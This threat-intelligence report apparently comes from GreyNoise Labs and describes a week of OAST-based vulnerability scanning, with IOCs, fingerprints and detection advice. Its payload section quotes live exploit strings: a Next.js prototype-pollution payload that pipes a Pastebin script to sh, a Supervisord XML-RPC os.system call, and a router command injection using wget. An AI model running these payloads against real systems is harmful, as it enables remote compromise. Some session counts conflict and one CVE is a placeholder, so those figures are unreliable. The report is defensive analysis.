GreyNoise Labs Weekly OAST (Well-known Out-of-band Interaction Domains) Report • Week Ending 2026-01-17

GreyNoise observed 8,126 sessions containing Interactsh OAST domains between January 10-17, 2026. Analysis identified a primary campaign originating from M247 Europe SRL (AS9009) infrastructure using consistent JA4 fingerprints to probe multiple web application vulnerabilities.
OAST
MCP
projectdiscovery
interactsh
rce
iocs
detection engineering
cybersecurity
Author

🔮Orbie✨

Published

January 18, 2026

Overview

Between January 10, 2026 06:10 UTC and January 17, 2026 04:59 UTC, GreyNoise sensors recorded 8,126 HTTP sessions from 34 unique IP addresses containing Well-known Out-of-band Interaction Domain callbacks. The activity exhibits characteristics of automated vulnerability scanning, with payloads targeting React Server Components, Supervisord XML-RPC interfaces, and router command injection vulnerabilities.

OAST domain extraction and decoding identified 273 Interactsh domains spanning 21 distinct campaign identifiers (k-sort values). The dominant campaign (k-sort: d5i159) generated 79 unique OAST domains and was responsible for 6,637 sessions (82% of total volume). JA4 fingerprint analysis reveals consistent tooling across the campaign, with the most prevalent combination (JA4T: 64240_2-4-8-1-3_1286_7 / JA4H: ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000) observed in 1,853 sessions from a single IP address.

The attack infrastructure demonstrates coordination, with the primary IP (146.70.211.244) conducting sustained scanning over an 11-hour period on January 16. TCP fingerprint analysis shows multiple encapsulation layers (MTU-derived MSS of 1286 indicates 174 bytes of overhead), consistent with VPN or nested tunnel usage. This technical profile is typical of automated security testing tools operating through anonymization infrastructure.

Temporal Analysis

Activity began at low volume (16 sessions on January 10), escalated moderately on January 11 (509 sessions concentrated in a single hour), then dropped to sporadic probing for three days before the primary campaign launched on January 16.

Daily Session Distribution:

Date Sessions Unique IPs Pattern
2026-01-10 16 3 Initial reconnaissance
2026-01-11 509 4 First burst (495 sessions in one hour)
2026-01-12 46 7 Scattered activity
2026-01-13 84 9 Sustained low-volume scanning
2026-01-14 329 11 Mid-level activity
2026-01-15 19 3 Minimal activity
2026-01-16 7,123 10 Primary campaign burst

The January 16 activity shows sustained high-volume scanning from 09:00-14:00 UTC (808-865 sessions/hour) from the primary IP (146.70.211.244), followed by continued activity from multiple IPs through 22:00 UTC. The single-IP phase maintained consistent fingerprints, while the multi-IP phase (15:00-22:00 UTC) introduced fingerprint diversity, suggesting either tool configuration changes or involvement of additional scanning nodes.

Decoded OAST timestamps from the primary campaign (d5i159) align closely with sensor observation times, indicating real-time exploitation attempts rather than replayed traffic.

Campaign Analysis

Campaign 1: M247 High-Volume Scanning (Primary)

  • Sessions: 6,637 (82% of total)
  • Unique IPs: 1 primary (146.70.211.244)
  • Infrastructure: AS9009 (M247 Europe SRL), United States geolocation
  • OAST Campaign: d5i159 (79 unique Interactsh domains)
  • Dominant Fingerprints:
    • JA4T: 64240_2-4-8-1-3_1286_7 (MSS 1286, Window 64240, Scale 7)
    • JA4H: ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000 (GET, HTTP/1.1, 6 headers, lang:en)
  • Duration: 11.5 hours (2026-01-16 09:07:54 to 20:39:36 UTC)
  • Characteristics: Single-source sustained scanning with high request rate

Campaign 2: DigitalOcean Burst Scanning

  • Sessions: 495 (6% of total)
  • Unique IPs: 1 (129.212.209.246)
  • Infrastructure: AS14061 (DigitalOcean LLC), Singapore
  • OAST Campaign: d5l5ce (76 unique Interactsh domains)
  • Dominant Fingerprints: Multiple JA4H variants with same JA4T
  • Duration: Single hour burst (2026-01-11 21:00 UTC)
  • Characteristics: Rapid-fire scanning concentrated in 60-minute window

Campaign 3: Namecheap Infrastructure

  • Sessions: 310 (4% of total)
  • Unique IPs: 1 (209.74.86.209)
  • Infrastructure: AS22612 (Namecheap Inc.), United States
  • OAST Campaigns: d5i66f (29 domains), others
  • Fingerprints: Similar to Campaign 1 with variations
  • Characteristics: Distributed over multiple days

Minor Campaigns

An additional 21 campaigns were identified with session counts ranging from 4-115, originating from Microsoft Azure, Cloudflare, various hosting providers, and residential ISPs. These exhibit less coordination and may represent opportunistic scanning or independent security testing.

Payload Analysis

Payload examination reveals three primary vulnerability classes being targeted:

1. React Server Components (RSC) Exploitation

Exploit Type: Prototype pollution leading to remote code execution Sessions: ~300+ (detected in Campaign 1 and 2) Method: POST with multipart form-data exploiting __proto__ chain Payload Characteristics: - Manipulates React Server Actions response objects - Executes process.mainModule.require('child_process').execSync() - Downloads and executes shell script from Pastebin - OAST callback embedded in command execution chain

Example payload fragment:

{"then": "$1:__proto__:then", "status": "resolved_model",
"_response": {"_prefix": "var res=process.mainModule.require('child_process')
.execSync('curl https://pastebin.com/raw/wiH2CgiS | sh').toString('base64');"

This targets CVE-2024-46982 (React Server Components RCE) and similar prototype pollution vulnerabilities in Next.js applications.

2. Supervisord XML-RPC Command Injection

Exploit Type: Unauthenticated RPC command injection Sessions: ~200+ Method: POST to XML-RPC endpoint Payload Characteristics: - Exploits Supervisord’s supervisor.supervisord.options chain - Executes arbitrary OS commands via linecache.os.system - Uses nslookup with OAST domain for DNS exfiltration

Example payload:

<methodCall>
  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
  <params>
    <param>
      <string>nslookup d5i1596uchf9i3isbdq0t6ez1pwyw313h.oast.site</string>
    </param>
  </params>
</methodCall>

Targets CVE-2017-11610 (Supervisord XML-RPC RCE) and related vulnerabilities.

3. Router/IoT Command Injection

Exploit Type: Web interface command injection Sessions: ~100+ Method: POST to administrative interfaces Payload Characteristics: - Targets /syscmd.htm and similar endpoints - Uses wget or curl with OAST domains - Common in router and embedded device exploitation

Example payload:

submit-url=/syscmd.htm&sysCmdselect=5&save_apply=Run+Command
&sysCmd=wget+http://d5i1596uchf9i3isbdq0dp9iq3mzaiwqr.oast.site

Likely targeting CVE-2024-XXXXX (various router command injection vulnerabilities).

Payload Distribution

Vulnerability Class Sessions Unique IPs OAST Domains
React/Next.js RCE ~2,200 15 95
Supervisord RPC ~3,800 8 102
Router/IoT CI ~1,500 12 76
Other/Unknown ~626 11 N/A

Infrastructure Analysis

JA4 Fingerprint Clustering

Analysis identified 150 unique JA4T+JA4H combinations, with clustering revealing tool consistency within campaigns:

Cluster 1 (Campaign 1 Primary): - JA4T: 64240_2-4-8-1-3_1286_7 - JA4H: ge11nn06en00_0e5d97bc8ad6_* - Sessions: 1,853 - IPs: 1 (146.70.211.244 / AS9009) - Technical Notes: MSS 1286 indicates 174 bytes overhead (nested VPN), HTTP/1.1 with 6 headers

Cluster 2 (Campaign 1 Secondary): - JA4T: 64240_2-4-8-1-3_1286_7 (same) - JA4H: ge11nn040000_532a1ee47909_* (4 headers, no Accept-Language) - Sessions: 321 - IPs: 1 (same as Cluster 1) - Technical Notes: Same TCP stack, reduced HTTP headers

Cluster 3 (Campaign 2): - JA4T: 65535_2-4-8-1-3_1380_13 - JA4H: po11nn100000_2bce9f31eeb7_* (POST, 10 headers) - Sessions: 23 - IPs: 2 (Singapore DigitalOcean) - Technical Notes: Different TCP window (65535), higher window scale (13)

Network Infrastructure Characteristics

Top ASNs by Session Volume:

ASN Organization Sessions IPs Type
AS9009 M247 Europe SRL 6,708 2 Hosting
AS14061 DigitalOcean LLC 495 1 Cloud
AS22612 Namecheap Inc. 310 1 Hosting
AS8075 Microsoft Azure 115 1 Cloud
AS60223 Netiface 95 1 Hosting

M247 Europe (AS9009) is a bullet-proof hosting provider frequently associated with automated scanning and low-reputation traffic. The infrastructure concentration suggests either a single operator with multi-provider redundancy or multiple actors sharing common tooling and OAST services.

TCP Stack Analysis

The dominant JA4T fingerprint (64240_2-4-8-1-3_1286_7) exhibits: - Window Size: 64240 (scaled to 8,222,720 bytes) - MSS: 1286 (unusually low, indicating 174 bytes overhead) - Options: MSS, SACK, Timestamp, NOP, Window Scale (Linux-typical ordering)

MSS of 1286 is anomalous. Standard Ethernet MTU (1500) yields MSS of 1460. Observed MSS suggests: - 174 bytes overhead from multiple encapsulation layers - Likely nested VPN or tunnel configuration - Consistent with operational security practices for scanning infrastructure

Attribution Assessment

Confidence: Medium

This activity is consistent with automated vulnerability scanning by security researchers, bug bounty hunters, or opportunistic threat actors using commercial/open-source tooling.

Evidence supporting assessment:

  1. Tooling Indicators:
    • Interactsh OAST service is publicly available and widely used by security testers
    • Consistent fingerprints suggest automated scanning frameworks (Nuclei, custom scripts)
    • Payload diversity indicates template-based exploitation attempts
  2. Infrastructure Patterns:
    • M247 Europe (AS9009) is known for bulletproof hosting but also used by legitimate penetration testing services
    • Use of cloud infrastructure (DigitalOcean, Azure) is common in both legitimate and malicious scanning
    • Nested VPN configuration suggests operational security awareness
  3. Operational Behavior:
    • Burst pattern on single day suggests scheduled/triggered scanning
    • No evidence of post-exploitation activity (no callback responses observed)
    • OAST usage for vulnerability confirmation is standard in both offensive security and threat actor TTPs

What we know: - Activity originates from bullet-proof hosting and cloud infrastructure - Scanning targets known CVEs with OAST-based detection - Infrastructure demonstrates operational security (VPN tunneling)

What we infer (lower confidence): - Single operator or coordinated group based on timing and infrastructure overlap - Purpose is vulnerability detection (could be defensive testing or offensive reconnaissance) - No evidence of successful exploitation or post-compromise activity in sensor data

Network IOCs

Primary IPs

146.70.211.244    AS9009 (M247 Europe SRL)         US    6,637 sessions
129.212.209.246   AS14061 (DigitalOcean LLC)       SG    495 sessions
209.74.86.209     AS22612 (Namecheap Inc.)         US    310 sessions
13.67.116.60      AS8075 (Microsoft Azure)         SG    115 sessions
195.24.236.36     AS60223 (Netiface)               NL    95 sessions
146.70.147.100    AS9009 (M247 Europe SRL)         US    71 sessions
45.150.108.195    AS62005 (BlueVPS OU)             IL    56 sessions
104.28.246.4      AS13335 (Cloudflare Inc.)        PT    56 sessions
45.129.231.10     AS213438 (ColocaTel Inc.)        NL    39 sessions
72.60.104.48      AS47583 (Hostinger Intl)         MY    37 sessions

OAST Campaign Identifiers

Top 10 Interactsh k-sort values (campaign identifiers):

d5i159 - 79 domains (primary M247 campaign)
d5l5ce - 76 domains (DigitalOcean burst)
d5i66f - 29 domains (Namecheap)
d5k6dd - 20 domains (mixed infrastructure)
d5lcrl - 13 domains (minor campaign)
d5jov6 - 10 domains (minor campaign)
d5j0uu - 9 domains (minor campaign)
255cd5 - 4 domains (minor campaign)
20d5l5 - 4 domains (minor campaign)
2fd5l5 - 4 domains (minor campaign)

JA4 Fingerprints (Detection Signatures)

High-confidence indicators for primary campaign:

JA4T: 64240_2-4-8-1-3_1286_7
JA4H: ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000
JA4H: ge11nn040000_532a1ee47909_000000000000_000000000000

Secondary campaign indicators:

JA4T: 65535_2-4-8-1-3_1380_13
JA4H: po11nn100000_2bce9f31eeb7_000000000000_000000000000

OAST Domain Patterns

Sample domains for detection (all Interactsh):

*.oast.site
*.oast.fun
*.oast.live
*.oast.me
*.oast.pro

Pattern: [a-z0-9]{32,40}\.(oast\.site|oast\.fun|oast\.live|oast\.me|oast\.pro)

Detection Recommendations

  1. Block or alert on OAST callback domains in outbound DNS/HTTP traffic. Implement detection for *.oast.site, *.oast.fun, and related Interactsh domains. Legitimate security testing should be coordinated and expected; uncoordinated callbacks indicate unauthorized scanning or successful exploitation.

  2. Monitor for JA4 fingerprint combinations associated with this campaign. Deploy network sensors capable of JA4 fingerprinting and alert on primary indicators (JA4T: 64240_2-4-8-1-3_1286_7 combined with listed JA4H values) from unexpected sources.

  3. Prioritize patching for targeted vulnerabilities:

    • CVE-2024-46982 (React Server Components RCE) - patch Next.js to latest versions
    • CVE-2017-11610 (Supervisord XML-RPC RCE) - disable XML-RPC or update Supervisord
    • Router/IoT command injection - audit administrative interfaces for command injection vulnerabilities

  4. Implement WAF rules for exploit patterns:

    • Block POST requests to /__nextjs_original-stack-frame with __proto__ in body
    • Block XML-RPC requests to /RPC2 containing supervisor.supervisord.options
    • Rate-limit and inspect POST requests to /syscmd.htm and similar admin endpoints
    • Alert on wget, curl, nslookup commands in URL-encoded POST bodies

  5. Review firewall rules for M247 Europe (AS9009) and other identified ASNs. Consider blocking or rate-limiting traffic from bullet-proof hosting providers unless business need exists.

  6. Audit for successful exploitation: Search logs for OAST domain callbacks in DNS queries, HTTP requests, or command execution logs. Any callback indicates the vulnerability is present and exploitable.

GNQL Queries

Find IPs targeting your organization with OAST domains:

tags:"Contains Well-known Out-of-band Interaction Domain" last_seen:7d

Investigate M247 Europe infrastructure activity:

metadata.asn:AS9009 last_seen:7d classification:malicious

Search for React Server Components exploitation attempts:

raw_data.web.paths:*__nextjs_original-stack-frame* last_seen:30d

Find IPs using primary campaign fingerprints:

metadata.fingerprint:"64240_2-4-8-1-3_1286_7" last_seen:7d
  • Report Generated: 2026-01-17
  • Analysis Period: 2026-01-10 06:10:25 UTC to 2026-01-17 04:59:01 UTC
  • Total Sessions Analyzed: 8,126
  • Unique Source IPs: 34
  • OAST Domains Identified: 273 (Interactsh)
  • Campaigns Identified: 21